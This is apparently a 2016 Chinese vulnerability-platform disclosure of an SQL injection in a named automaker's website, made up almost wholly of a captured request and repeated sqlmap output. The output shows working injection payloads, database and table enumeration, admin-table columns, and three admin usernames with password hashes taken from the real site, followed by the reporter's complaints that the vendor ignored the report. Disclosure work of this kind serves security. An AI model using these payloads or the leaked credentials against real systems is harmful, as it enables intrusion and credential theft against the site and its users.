2016-02-14: 细节已通知厂商并且等待厂商处理中 2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开
RT娱乐而已 刷个存在感 你会走大厂商么.
GET注入
GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203*2*1%3d6%20AND%20106%3d106 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.dongfeng-honda.com/Cookie: PHPSESSID=sg3e5k6l8mkrqlbp1qh4ttmq90; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2281077d9616d91bf9aa7dde5c79fd7fc6%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22112.236.32.109%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1455261982%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Ddc6321ccfbb2819f54ee8db010d9b7de; WT_FPC=id=29e92c2ab4dd03fd2531455261571288:lv=1455261778668:ss=1455261571288; __utmt=1; __utma=118242844.204872392.1455261566.1455261576.1455261576.1; __utmb=118242844.6.9.1455261986478; __utmc=118242844; __utmz=118242844.1455261576.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_4698ba1a14a0b270590a11db5898b67c=1455261586,1455261603,1455261768,1455261779; Hm_lpvt_4698ba1a14a0b270590a11db5898b67c=1455261779; _ga=GA1.2.204872392.1455261566; _gat=1; pt_26906001=uid=yYK0sHrtDZo8U928JgSbwg&nid=0&vid=WliG/TLgpT9STIp0VXDMwg&vn=2&pvn=1&sact=1455261594156&to_flag=0&pl=OL3022hYLcJhu/oXOit66g*pt*1455261594156; pt_s_26906001=vt=1455261594156&cad=; Hm_lvt_e6c5317da3c5de39054ad99b8f4736ee=1455260921,1455260992,1455261566; Hm_lpvt_e6c5317da3c5de39054ad99b8f4736ee=1455261566; CNZZDATA3080075=cnzz_eid%3D202617920-1455256801-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1455256801; visited=1; HMACCOUNT=5755128E85F5C5B7; test_cookie=CheckForPermission; id=22c90e64c30400b9||t=1455261579|et=730|cs=002213fd48ebb994302e124084; pt_t_26906001=?id=26906001.yYK0sHrtDZo8U928JgSbwg.WliG/TLgpT9STIp0VXDMwg.OL3022hYLcJhu/oXOit66g.Hhv2XaeyETu40OV7MmZwQA&stat=0.0.0.0.0body.0.0.810.30000.0.0&ptif=2; bdshare_firstime=1455261656497; BAIDUID=2B1217E89F0195C2819D75A6DD86BE33:FG=1; __utmv=Host: www.dongfeng-honda.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
sqlmap identified the following injection point(s) with a total of 859 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106---web application technology: PHP 5.3.9back-end DBMS: MySQL 5.0sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106---web application technology: PHP 5.3.9back-end DBMS: MySQL 5.0available databases [21]:[*] cdcol[*] crossdriving[*] crossdriving3rd[*] crv_2011[*] dongben_wdhac[*] dongbzt[*] dongfeng_activity[*] dongfeng_club[*] greiz_luck[*] honda[*] honda_10year[*] honda_2hc[*] honda_campaign[*] honda_stayahead[*] hondaxy[*] information_schema[*] jade[*] jiede_activity[*] mysql[*] phpmyadmin[*] spirior_xrvsqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106---web application technology: PHP 5.3.9back-end DBMS: MySQL 5.0current database: 'honda_2hc'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106---web application technology: PHP 5.3.9back-end DBMS: MySQL 5.0current user is DBA: Truesqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106---web application technology: PHP 5.3.9back-end DBMS: MySQL 5.0Database: honda_2hc[54 tables]+----------------------------+| cd_2ws_order || cd_2ws_ownerstory || cd_admin || cd_admin_login || cd_advanced || cd_advanced_popedom || cd_adver || cd_adver_page || cd_attachment || cd_ci_sessions || cd_dream_dreams || cd_dream_log || cd_dream_log_zd || cd_dream_randnum || cd_dream_user || cd_filestamp || cd_group || cd_group_popedom || cd_hd_userinfo || cd_inquire || cd_link || cd_link_class || cd_message || cd_message_state || cd_news_class || cd_news_info || cd_reply || cd_rv_actinfo || cd_rv_area || cd_rv_area_copy || cd_rv_aream || cd_rv_dealer || cd_rv_dealer_insight || cd_rv_userinfo || cd_rv_userinfo_api || cd_rv_userinfo_api_toexcel || cd_rv_userinfo_buy || cd_rv_userinfo_elysion || cd_rv_userinfo_m || cd_rv_userinfo_mobile || cd_rv_userinfo_pcenter || cd_sp_log || cd_sp_user || cd_spirior_order || cd_system_info || cd_tags || cd_userinfo_api_ad || cd_v_admin || cd_v_inbox || cd_v_news_class || cd_v_rv_userinfo_api || cd_v_rv_userinfo_m || cdb_article || cdb_article_copy |+----------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106---web application technology: PHP 5.3.9back-end DBMS: MySQL 5.0Database: honda_2hcTable: cd_admin[21 columns]+---------------+-------------+| Column | Type |+---------------+-------------+| answer | varchar(50) || birthday | varchar(10) || cardid | varchar(18) || createTime | int(11) || email | varchar(50) || group_id | smallint(6) || id | int(11) || lastLoginIp | int(11) || lastLoginTime | int(11) || loginCount | int(11) || mobile | varchar(30) || modifyTime | int(11) || msn | varchar(50) || name | varchar(30) || pass | varchar(32) || phone | varchar(30) || posts | varchar(50) || qq | varchar(20) || question | varchar(50) || realname | varchar(50) || state | tinyint(4) |+---------------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106---web application technology: PHP 5.3.9back-end DBMS: MySQL 5.0Database: honda_2hcTable: cd_admin[3 entries]+---------+----------------------------------+| name | pass |+---------+----------------------------------+| admin | cc03577bda0309a89498a1c7a58f3f62 || yangnan | 8e005e4bbecd53c1fa6f244d5b4af170 || jiahuan | 1eb2eb89d66acd6799084e07cda6a0f6 |+---------+----------------------------------+
上个装逼图:
危害等级:无影响厂商忽略
忽略时间:2016-02-22 09:00
漏洞Rank:4 (WooYun评价)
暂无
@dongfeng-honda.com 准备忽略么?
@疯狗 @浩天 这种洞为何会忽略掉?
@dongfeng-honda.com 为毛会忽略掉? 我想知道... 没有威胁性?